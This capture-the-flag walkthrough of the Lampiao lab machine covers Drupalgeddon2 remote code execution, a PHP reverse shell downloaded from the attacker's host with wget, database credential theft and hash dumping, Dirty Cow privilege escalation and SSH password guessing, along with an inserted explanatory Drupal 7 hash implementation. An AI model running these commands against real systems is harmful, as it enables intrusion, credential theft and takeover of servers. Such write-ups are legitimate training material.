Lampiao
Netdiscover
192.168.1.141
Port scan
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open tcpwrapped syn-ack ttl 64
1898/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
Port 80
Port 1898
robots.txt has an interesting entry: Disallow: /CHANGELOG.txt
Found an [exploit for Drupal 7 < 7.57](https://github.com/pimps/CVE-2018-7600)
RCE via CVE-2018-7600
./drupa7-CVE-2018-7600.py -c whoami http://lampiano:1898/
Reverse PHP webshell
Copy the PHP reverse shell to your working folder
cp /usr/share/webshells/php/php-reverse-shell.php .
Remove the comments and change the IP/port to your listener
Host the file on a web server
python3 -m http.server 82
Download it onto the victim
./drupa7-CVE-2018-7600.py -c 'wget http://192.168.1.112:88/php-reverse-shell.php' http://lampiano:1898/
Activate the shell by visiting the webpage
http://lampiano:1898/shell.php
Fix the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
linPEAS findings
Found DB creds in /var/www/html/sites/default/settings.php
Log into the database
mysql -u drupaluser -pVirgulino
Dump the users table
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| | |
| tiago | $S$DNZ5o1k/NY7SUgtJvjPqNl40kHKwn4yXy2eroEnOAlpmT0TJ9Sx8 |
| Eder | $S$Dv5orvhi7okjmViImnVPmVgfwJ2U..PNK4E9IT/k7Lqz9GZRb7tY |
| admin | $S$DQRp/JT8KnSM8cFRgzOlKL83DnHt6yxXieQ5hcq3me2bYeiA5p8A |
+-------+---------------------------------------------------------+
Tried cracking the hashes to no avail. Drupal 7 hashes take forever to crack, so I had plenty of time to think. PASSWORD REUSE. I should have immediately tried to su with the DB password.
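Why the cracking attempt stalled: a Drupal 7 `$S$` hash carries a cost character ('D' = 2^15 SHA-512 rounds) followed by an 8-character salt, so every guess is expensive by design. The reimplementation below is added here for illustration and is not from the writeup or Drupal's own code; it parses the setting prefix, recomputes a hash the way Drupal does, and verifies a password in constant time the way a login check does (the sample salt and password are constructed).

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MIN_LOG2, MAX_LOG2 = 7, 30   # accepted range for the cost character after "$S$"


def _password_base64(data: bytes) -> str:
    """phpass custom base64 (not RFC 4648): little-endian, 3 bytes -> 4 chars."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        value |= (data[i] << 8) if i < n else 0
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        value |= (data[i] << 16) if i < n else 0
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> tuple:
    """Split the 12-char setting prefix into (log2 cost, 8-char salt); 'D' means 2**15."""
    setting = stored[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 hash")
    log2 = ITOA64.index(setting[3])
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError("cost out of range")
    return log2, setting[4:12]


def drupal7_hash(password: str, setting: str) -> str:
    """Recompute the stored string for a password under an existing hash's setting."""
    log2, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << log2):   # 2**log2 extra rounds: this is what makes offline cracking slow
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _password_base64(digest))[:55]   # Drupal keeps only 55 chars


def check_password(password: str, stored: str) -> bool:
    """What Drupal's user_check_password() does at login: recompute, compare in constant time."""
    if len(password) > 512:      # Drupal refuses over-long input to avoid a hashing DoS
        return False
    return hmac.compare_digest(drupal7_hash(password, stored), stored)
```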
At this point we can drop the webshell and switch to ssh if desired.
Linpeas findings
Linux Exploit Suggester picked up Dirty Cow 2 as a possible exploit.
searchsploit -m 40847
Compile and run on the victim
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil && ./dcow -s
Root Flag
Additional exploitation methods
Able to break into tiago's account by scraping a detailed post and feeding all the words as passwords over SSH. It only takes about 7 seconds to find the correct password this way.